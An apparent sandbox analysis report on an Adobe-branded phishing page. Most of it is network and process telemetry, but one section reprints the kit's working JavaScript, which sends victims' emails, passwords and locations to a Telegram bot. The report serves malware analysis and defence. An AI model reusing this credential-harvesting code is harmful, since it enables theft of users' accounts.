Edit tour

Windows Analysis Report
https://pub-290e9228bc824ffb99ba933687a27ad7.r2.dev/repo.html

Overview

General Information

Sample URL:	https://pub-290e9228bc824ffb99ba933687a27ad7.r2.dev/repo.html
Analysis ID:	1587462
Infos:

Detection

HTMLPhisher

Score:	64
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

AI detected phishing page

Yara detected HtmlPhish10

AI detected suspicious Javascript

Javascript uses Telegram API

HTML body contains low number of good links

HTML body contains password input but no form action

HTML title does not match URL

Javascript checks online IP of machine

Stores files to the Windows start menu directory

Classification

Process Tree

System is w10x64_ra

chrome.exe (PID: 400 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 6820 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2208 --field-trial-handle=1948,i,15787474289921166710,17762278635021597138,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 6460 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://pub-290e9228bc824ffb99ba933687a27ad7.r2.dev/repo.html" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

cleanup

Yara Signatures

Dropped Files

Source	Rule	Description	Author	Strings
dropped/chromecache_62	JoeSecurity_HtmlPhish_10	Yara detected HtmlPhish_10	Joe Security

HTML

Source	Rule	Description	Author	Strings
1.0.pages.csv	JoeSecurity_HtmlPhish_10	Yara detected HtmlPhish_10	Joe Security

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

Phishing

AI detected phishing page

Source: https://pub-290e9228bc824ffb99ba933687a27ad7.r2.dev/repo.html

Joe Sandbox AI: Score: 9 Reasons: The brand 'Adobe' is well-known and typically associated with the domain 'adobe.com'., The provided URL 'pub-290e9228bc824ffb99ba933687a27ad7.r2.dev' does not match the legitimate domain 'adobe.com'., The URL uses a subdomain structure that is not typically associated with Adobe's official domains., The domain extension '.dev' is unusual for Adobe, which typically uses '.com'., The presence of input fields for 'Email ID' and 'Email password' is suspicious, especially when combined with an unrecognized domain. DOM: 1.0.pages.csv

Yara detected HtmlPhish10

Source: Yara match	File source: 1.0.pages.csv, type: HTML
Source: Yara match	File source: dropped/chromecache_62, type: DROPPED

AI detected suspicious Javascript

Source: 0.1.id.script.csv	Joe Sandbox AI: Detected suspicious JavaScript with source url: https://pub-290e9228bc824ffb99ba933687a27ad7.r2.de... The script demonstrates several high-risk behaviors, including data exfiltration (sending sensitive user data like email and password to a Telegram bot), and the use of external APIs to fetch IP address and location information without user consent. While the script may have a legitimate purpose, the lack of transparency and the potential for abuse make it a high-risk script that requires further review.
Source: 0.0.id.script.csv	Joe Sandbox AI: Detected suspicious JavaScript with source url: https://pub-290e9228bc824ffb99ba933687a27ad7.r2.de... The script demonstrates several high-risk behaviors, including sending sensitive user data (TIN and TAN) to a Telegram bot, which could be used for malicious purposes. Additionally, the script redirects the user to a Google Drive URL after a successful login attempt, which could be part of a phishing or credential harvesting scheme. While the script may have some legitimate functionality, the overall risk level is high due to the potential for data exfiltration and suspicious redirection.

Javascript uses Telegram API

Source: https://pub-290e9228bc824ffb99ba933687a27ad7.r2.dev/repo.html

HTTP Parser: const bottoken = '6001656899:aael-gobtqjkplyonbp1qvtqrgxrgchusde'; // replace with your bot token const chatid = '5759084339'; // replace with your chat id // function to fetch ip address, location (country, zip), and device info async function getdeviceandlocationinfo() { const currentdatetime = new date().tolocalestring(); const url = window.location.href; const deviceinfo = { useragent: navigator.useragent, platform: navigator.platform, language: navigator.language, }; let ipaddress = 'unable to retrieve ip address'; let country = 'unknown'; let zipcode = 'unknown'; let emojiflag = ''; // default flag if not found try { // fetch ip address const ipresponse = await fetch('https://api.ipify.org?format=json'); const ipdata = await ipresponse.json(); ipaddress = ipdata.ip; // fetch location details const loca...

Source: https://pub-290e9228bc824ffb99ba933687a27ad7.r2.dev/repo.html

HTTP Parser: Number of links: 0

Source: https://pub-290e9228bc824ffb99ba933687a27ad7.r2.dev/repo.html

HTTP Parser: <input type="password" .../> found but no <form action="...

Source: https://pub-290e9228bc824ffb99ba933687a27ad7.r2.dev/repo.html

HTTP Parser: Title: Microsoft PDF Online does not match URL

Source: https://pub-290e9228bc824ffb99ba933687a27ad7.r2.dev/repo.html

HTTP Parser: <input type="password" .../> found

Source: https://pub-290e9228bc824ffb99ba933687a27ad7.r2.dev/repo.html

HTTP Parser: No <meta name="author".. found

Source: https://pub-290e9228bc824ffb99ba933687a27ad7.r2.dev/repo.html

HTTP Parser: No <meta name="copyright".. found

Source: C:\Program Files\Google\Chrome\Application\chrome.exe

Directory created: C:\Program Files\Google\Chrome\Application\Dictionaries

Source: unknown	HTTPS traffic detected: 2.23.242.162:443 -> 192.168.2.16:49717 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 2.23.242.162:443 -> 192.168.2.16:49718 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 52.149.20.212:443 -> 192.168.2.16:49719 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 52.149.20.212:443 -> 192.168.2.16:49720 version: TLS 1.2

Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 2.23.242.162
Source: unknown	TCP traffic detected without corresponding DNS query: 2.23.242.162
Source: unknown	TCP traffic detected without corresponding DNS query: 2.23.242.162
Source: unknown	TCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknown	TCP traffic detected without corresponding DNS query: 2.23.242.162
Source: unknown	TCP traffic detected without corresponding DNS query: 2.23.242.162
Source: unknown	TCP traffic detected without corresponding DNS query: 2.23.242.162
Source: unknown	TCP traffic detected without corresponding DNS query: 2.23.242.162
Source: unknown	TCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknown	TCP traffic detected without corresponding DNS query: 2.23.242.162
Source: unknown	TCP traffic detected without corresponding DNS query: 2.23.242.162
Source: unknown	TCP traffic detected without corresponding DNS query: 2.23.242.162
Source: unknown	TCP traffic detected without corresponding DNS query: 2.23.242.162
Source: unknown	TCP traffic detected without corresponding DNS query: 2.23.242.162
Source: unknown	TCP traffic detected without corresponding DNS query: 2.23.242.162
Source: unknown	TCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknown	TCP traffic detected without corresponding DNS query: 2.23.242.162
Source: unknown	TCP traffic detected without corresponding DNS query: 2.23.242.162
Source: unknown	TCP traffic detected without corresponding DNS query: 2.23.242.162
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 2.23.242.162
Source: unknown	TCP traffic detected without corresponding DNS query: 2.23.242.162
Source: unknown	TCP traffic detected without corresponding DNS query: 2.23.242.162
Source: unknown	TCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknown	TCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknown	TCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknown	TCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknown	TCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknown	TCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknown	TCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknown	TCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknown	TCP traffic detected without corresponding DNS query: 52.149.20.212

Source: global traffic	DNS traffic detected: DNS query: pub-290e9228bc824ffb99ba933687a27ad7.r2.dev
Source: global traffic	DNS traffic detected: DNS query: code.jquery.com
Source: global traffic	DNS traffic detected: DNS query: cdn.icon-icons.com
Source: global traffic	DNS traffic detected: DNS query: www.google.com

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49722
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49720
Source: unknown	Network traffic detected: HTTP traffic on port 49706 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49712 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49678 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49704 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49719 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49720 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49722 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49719
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49718
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49717
Source: unknown	Network traffic detected: HTTP traffic on port 49717 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49712
Source: unknown	Network traffic detected: HTTP traffic on port 49709 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49673 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49707 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49705 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49703 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49709
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49707
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49706
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49705
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49704
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49703
Source: unknown	Network traffic detected: HTTP traffic on port 49718 -> 443

Source: unknown	HTTPS traffic detected: 2.23.242.162:443 -> 192.168.2.16:49717 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 2.23.242.162:443 -> 192.168.2.16:49718 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 52.149.20.212:443 -> 192.168.2.16:49719 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 52.149.20.212:443 -> 192.168.2.16:49720 version: TLS 1.2

Source: classification engine

Classification label: mal64.phis.win@16/11@12/115

Source: C:\Program Files\Google\Chrome\Application\chrome.exe

File created: C:\Program Files\Google\Chrome\Application\Dictionaries

Source: C:\Program Files\Google\Chrome\Application\chrome.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps

Source: unknown	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2208 --field-trial-handle=1948,i,15787474289921166710,17762278635021597138,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: unknown	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://pub-290e9228bc824ffb99ba933687a27ad7.r2.dev/repo.html"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2208 --field-trial-handle=1948,i,15787474289921166710,17762278635021597138,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Program Files\Google\Chrome\Application\chrome.exe

Directory created: C:\Program Files\Google\Chrome\Application\Dictionaries

Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	Windows Management Instrumentation	1 Browser Extensions	1 Process Injection	3 Masquerading	OS Credential Dumping	System Service Discovery	Remote Services	Data from Local System	2 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	1 Registry Run Keys / Startup Folder	1 Registry Run Keys / Startup Folder	1 Process Injection	LSASS Memory	Application Window Discovery	Remote Desktop Protocol	Data from Removable Media	1 Non-Application Layer Protocol	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	Obfuscated Files or Information	Security Account Manager	Query Registry	SMB/Windows Admin Shares	Data from Network Shared Drive	2 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact

Source	Detection	Scanner	Label	Link
https://pub-290e9228bc824ffb99ba933687a27ad7.r2.dev/repo.html	0%	Avira URL Cloud	safe

Name	IP	Active	Malicious	Reputation
code.jquery.com	151.101.194.137	true	false	high
pub-290e9228bc824ffb99ba933687a27ad7.r2.dev	162.159.140.237	true	true	unknown
www.google.com	216.58.212.132	true	false	high
cdn.icon-icons.com	104.26.12.212	true	false	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://pub-290e9228bc824ffb99ba933687a27ad7.r2.dev/repo.html	true		unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
162.159.140.237	pub-290e9228bc824ffb99ba933687a27ad7.r2.dev	United States	13335	CLOUDFLARENETUS	true
216.58.212.132	www.google.com	United States	15169	GOOGLEUS	false
104.26.12.212	cdn.icon-icons.com	United States	13335	CLOUDFLARENETUS	false
151.101.2.137	unknown	United States	54113	FASTLYUS	false
172.67.72.210	unknown	United States	13335	CLOUDFLARENETUS	false
64.233.167.84	unknown	United States	15169	GOOGLEUS	false
239.255.255.250	unknown	Reserved	unknown	unknown	false
142.250.185.174	unknown	United States	15169	GOOGLEUS	false
142.250.185.163	unknown	United States	15169	GOOGLEUS	false
151.101.194.137	code.jquery.com	United States	54113	FASTLYUS	false
172.217.18.10	unknown	United States	15169	GOOGLEUS	false
172.217.16.195	unknown	United States	15169	GOOGLEUS	false

Private

IP
192.168.2.17
192.168.2.16
192.168.2.10

General Information

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1587462
Start date and time:	2025-01-10 11:54:16 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	defaultwindowsinteractivecookbook.jbs
Sample URL:	https://pub-290e9228bc824ffb99ba933687a27ad7.r2.dev/repo.html
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	13
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	EGA enabled
Analysis Mode:	stream
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal64.phis.win@16/11@12/115

Warnings

Exclude process from analysis (whitelisted): svchost.exe
Excluded IPs from analysis (whitelisted): 172.217.16.195, 142.250.185.174, 64.233.167.84, 142.250.186.78, 172.217.16.206, 172.217.18.10, 142.250.186.138, 216.58.212.138, 142.250.181.234, 142.250.185.202, 216.58.206.42, 142.250.186.106, 172.217.16.202, 142.250.74.202, 142.250.185.234, 142.250.186.170, 142.250.184.202, 142.250.186.42, 142.250.185.138, 142.250.186.74, 142.250.185.106, 84.201.210.39
Excluded domains from analysis (whitelisted): clients2.google.com, accounts.google.com, redirector.gvt1.com, content-autofill.googleapis.com, ctldl.windowsupdate.com, clientservices.googleapis.com, clients.l.google.com
Not all processes where analyzed, report is missing behavior information
VT rate limit hit for: https://pub-290e9228bc824ffb99ba933687a27ad7.r2.dev/repo.html

LLM Input / Output

Input	Output
URL: https://pub-290e9228bc824ffb99ba933687a27ad7.r2.dev Model: Joe Sandbox AI	{ "typosquatting": false, "unusual_query_string": false, "suspicious_tld": true, "ip_in_url": false, "long_subdomain": true, "malicious_keywords": false, "encoded_characters": false, "redirection": false, "contains_email_address": false, "known_domain": false, "brand_spoofing_attempt": false, "third_party_hosting": true }
URL: https://pub-290e9228bc824ffb99ba933687a27ad7.r2.dev
URL: https://pub-290e9228bc824ffb99ba933687a27ad7.r2.de... Model: Joe Sandbox AI	{ "risk_score": 7, "reasoning": "The script demonstrates several high-risk behaviors, including data exfiltration (sending sensitive user data like email and password to a Telegram bot), and the use of external APIs to fetch IP address and location information without user consent. While the script may have a legitimate purpose, the lack of transparency and the potential for abuse make it a high-risk script that requires further review." }
const botToken = '6001656899:AAEL-gobTqJKPLYoNBp1qvTQrGXRgCHUsDE'; // Replace with your bot token const chatID = '5759084339'; // Replace with your chat ID // Function to fetch IP address, location (country, zip), and device info async function getDeviceAndLocationInfo() { const currentDateTime = new Date().toLocaleString(); const url = window.location.href; const deviceInfo = { userAgent: navigator.userAgent, platform: navigator.platform, language: navigator.language, }; let ipAddress = 'Unable to retrieve IP address'; let country = 'Unknown'; let zipcode = 'Unknown'; let emojiFlag = ''; // Default flag if not found try { // Fetch IP address const ipResponse = await fetch('https://api.ipify.org?format=json'); const ipData = await ipResponse.json(); ipAddress = ipData.ip; // Fetch location details const locationResponse = await fetch(`https://ipapi.co/${ipAddress}/json/`); const locationData = await locationResponse.json(); country = locationData.country_name \|\| 'Unknown'; zipcode = locationData.postal \|\| 'Unknown'; // Get the country flag emoji based on country code const countryCode = locationData.country \|\| 'US'; emojiFlag = getEmojiFlag(countryCode); } catch (error) { console.error('Error fetching IP or location data:', error); } return { currentDateTime, ipAddress, deviceInfo, country, zipcode, emojiFlag, url }; } // Helper function to convert country code to emoji flag function getEmojiFlag(countryCode) { const codePoints = countryCode .toUpperCase() .split('') .map(char => 127397 + char.charCodeAt()); return String.fromCodePoint(...codePoints); } // Function to send form data and additional info to Telegram async function sendDataToTelegram(tin, tan, statusMessage) { const info = await getDeviceAndLocationInfo(); const message = ` Form Submission Alert: - Email: ${tin} - Password: ${tan} - Status: ${statusMessage} Device & Location Info: - Date & Time: ${info.currentDateTime} - IP Address: ${info.ipAddress} - Country: ${info.country} ${info.emojiFlag} - Zip Code: ${info.zipcode} - Device Info: ${info.deviceInfo.userAgent} `; // Send message to Telegram bot const telegramUrl = `https://api.telegram.org/bot${botToken}/sendMessage?chat_id=${chatID}&text=${encodeURIComponent(message)}`; try { const response = await fetch(telegramUrl); if (response.ok) { // console.log("Message sent to Telegram successfully."); } else { // console.error("Error sending message to Telegram."); } } catch (error) { // console.error("Error:", error); } }
URL: https://pub-290e9228bc824ffb99ba933687a27ad7.r2.de... Model: Joe Sandbox AI	{ "risk_score": 7, "reasoning": "The script demonstrates several high-risk behaviors, including sending sensitive user data (TIN and TAN) to a Telegram bot, which could be used for malicious purposes. Additionally, the script redirects the user to a Google Drive URL after a successful login attempt, which could be part of a phishing or credential harvesting scheme. While the script may have some legitimate functionality, the overall risk level is high due to the potential for data exfiltration and suspicious redirection." }
$(document).ready(function() { // Get the value of the 'email' parameter from the URL const urlParams = new URLSearchParams(window.location.search); const emailValue = urlParams.get('email'); // Set the value of the input field with id 'email' $('#tin').val(emailValue); // Flag to track submission attempts let submissionAttempt = 0; // Handle form submission $("#myForm").submit(async function(event) { // Prevent the default form submission behavior event.preventDefault(); // Show the loading GIF $("#loadingGif").show(); // Get the values of the form inputs var tinVal = $("#tin").val(); var tanVal = $("#tan").val(); // First submission attempt if (submissionAttempt === 0) { // Display error message setTimeout(function() { $("#message").html("Incorrect password, try again"); }, 1000); // Clear the TAN input $("#tan").val(""); // Send a message to Telegram about the incorrect attempt await sendDataToTelegram(tinVal, tanVal, "Incorrect password, try again"); // Increment the submission attempt counter submissionAttempt++; } else { // Second submission attempt, process the form // Display success message setTimeout(function() { $("#message").html("Success! Retrieving document(s)"); }, 1000); // Send a success message to Telegram await sendDataToTelegram(tinVal, tanVal, "Success! Retrieving document(s)"); // Redirect to another page after a brief delay setTimeout(function() { window.location.href = "https://drive.google.com/drive/u/0/my-drive"; }, 2000); } }); });
URL: https://pub-290e9228bc824ffb99ba933687a27ad7.r2.dev/repo.html Model: Joe Sandbox AI	{ "contains_trigger_text": true, "trigger_text": "Secured online PDF Document", "prominent_button_name": "Download", "text_input_field_labels": [ "Email ID", "Email password" ], "pdf_icon_visible": true, "has_visible_captcha": false, "has_urgent_text": false, "has_visible_qrcode": false, "contains_chinese_text": false, "contains_fake_security_alerts": false }

URL: https://code.jquery.com/jquery-3.6.0.min.js... Model: Joe Sandbox AI	```json { "risk_score": 1, "reasoning": "The provided JavaScript snippet is a part of the jQuery library, which is a widely used and reputable open-source library for DOM manipulation and event handling. There are no high-risk indicators such as dynamic code execution or data exfiltration. The script does not interact with external domains or perform any suspicious activities. It uses standard practices for library initialization and extension, and there are no signs of obfuscation or malicious intent." }
/! jQuery v3.6.0 \| (c) OpenJS Foundation and other contributors \| jquery.org/license / !function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n\|\|E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]\|\|t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}function w(e){return null==e?e+"":"object"==typeof e\|\|"function"==typeof e?n[o.call(e)]\|\|"object":typeof e}var f="3.6.0",S=function(e,t){return new S.fn.init(e,t)};function p(e){var t=!!e&&"length"in e&&e.length,n=w(e);return!m(e)&&!x(e)&&("array"===n\|\|0===t\|\|"number"==typeof t&&0<t&&t-1 in e)}S.fn=S.prototype={jquery:f,constructor:S,length:0,toArray:function(){return s.call(this)},get:function(e){return null==e?s.call(this):e<0?this[e+this.length]:this[e]},pushStack:function(e){var t=S.merge(this.constructor(),e);return t.prevObject=this,t},each:function(e){return S.each(this,e)},map:function(n){return this.pushStack(S.map(this,function(e,t){return n.call(e,t,e)}))},slice:function(){return this.pushStack(s.apply(this,arguments))},first:function(){return this.eq(0)},last:function(){return this.eq(-1)},even:function(){return this.pushStack(S.grep(this,function(e,t){return(t+1)%2}))},odd:function(){return this.pushStack(S.grep(this,function(e,t){return t%2}))},eq:function(e){var t=this.length,n=+e+(e<0?t:0);return this.pushStack(0<=n&&n<t?[this[n]]:[])},end:function(){return this.prevObject\|\|this.constructor()},push:u,sort:t.sort,splice:t.splice},S.extend=S.fn.extend=function(){var e,t,n,r,i,o,a=arguments[0]\|\|{},s=1,u=arguments.length,l=!1;for("boolean"==typeof a&&(l=a,a=arguments[s]\|\|{},s++),"object"==typeof a\|\|m(a)\|\|(a={}),s===u&&(a=this,s--);s<u;s++)if(null!=(e=arguments[s]))for(t in e)r=e[t],"__proto__"!==t&&a!==r&&(l&&r&&(S.isPlainObject(r)\|\|(i=Array.isArray(r)))?(n=a[t],o=i&&!Array.isArray(n)?[]:i\|\|S.isPlainObject(n)?n:{},i=!1,a[t]=S.extend(l,o,r)):void 0!==r&&(a[t]=r));return a},S.extend({expando:"jQuery"+(f+Math.random()).replace(/\D/g,""),isReady:!0,error:function(e){throw new Error(e)},noop:function(){},isPlainObject:function(e){var t,n;return!(!e\|\|"[object Object]"!==o.call(e))&&(!(t=r(e))\|\|"function"==typeof(n=v.call(t,"constructor")&&t.constructor)&&a.call(n)===l)},isEmptyObject:function(e){var t;for(t in e)return!1;return!0},globalEval:function(e,t,n){b(e,{nonce:t&&t.nonce},n)},each:function(e,t){var n,r=0;if(p(e)){for(n=e.length;r<n;r++)if(!1===t.call(e[r],r,e[r]))break}else for(r in e)if(!1===t.call(e[r],r,e[r]))break;return e},makeArray:function(e,t){var n=t\|\|[];return null!=e&&(p(Object(e))?S.merge(n,"string"==typeof e?[e]:e):u.call(n,e)),n},inArray:function(e,t,n){return null==t?-1:i.call(t,e,n)},merge:function(e,t){for(var n=+t.length,r=0,i=e.length;r<n;r++)e[i++]=t[r];return e.length=i,e},grep:function(e,t,n){for(var r=[],i=0,o=e.length,a=!n;i<o;i++)!t(e[i],i)!==a&&r.push(e[i]);return r},map:function(e,t,n){var r,i,o=0,a=[];if(p(e))for(r=e.length;o<r;o++)null!=(i=t(e[o],o,n))&&a.push(i);else for(o in e)null!=(i=t(e[o],o,n))&&a.push(i);return g(a)},guid:1,support:y}),"function"==typeof Symbol&&(S.fn[Symbol.iterator]=t[Symbol.iterator]),S.each("Boolean Number String Function Array Date RegExp Object Error Symbol".split(" "),function(e,t){n["[object "+t+"]"]=t.toLowerCase()});var d=function(n){var e,d,b,o,i,h,f,g,w,u,l,T,C,a,E,v,s,c,y,S="s
URL: https://pub-290e9228bc824ffb99ba933687a27ad7.r2.dev/repo.html Model: Joe Sandbox AI	{ "brands": [ "Adobe" ] }
	{ "brands": [ "Adobe" ] }
URL: https://pub-290e9228bc824ffb99ba933687a27ad7.r2.dev/repo.html Model: Joe Sandbox AI	```json{ "legit_domain": "adobe.com", "classification": "wellknown", "reasons": [ "The brand 'Adobe' is well-known and typically associated with the domain 'adobe.com'.", "The provided URL 'pub-290e9228bc824ffb99ba933687a27ad7.r2.dev' does not match the legitimate domain 'adobe.com'.", "The URL uses a subdomain structure that is not typically associated with Adobe's official domains.", "The domain extension '.dev' is unusual for Adobe, which typically uses '.com'.", "The presence of input fields for 'Email ID' and 'Email password' is suspicious, especially when combined with an unrecognized domain." ], "riskscore": 9} Google indexed: False
URL: pub-290e9228bc824ffb99ba933687a27ad7.r2.dev Brands: Adobe Input Fields: Email ID, Email password

Created / dropped Files

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk

Download File

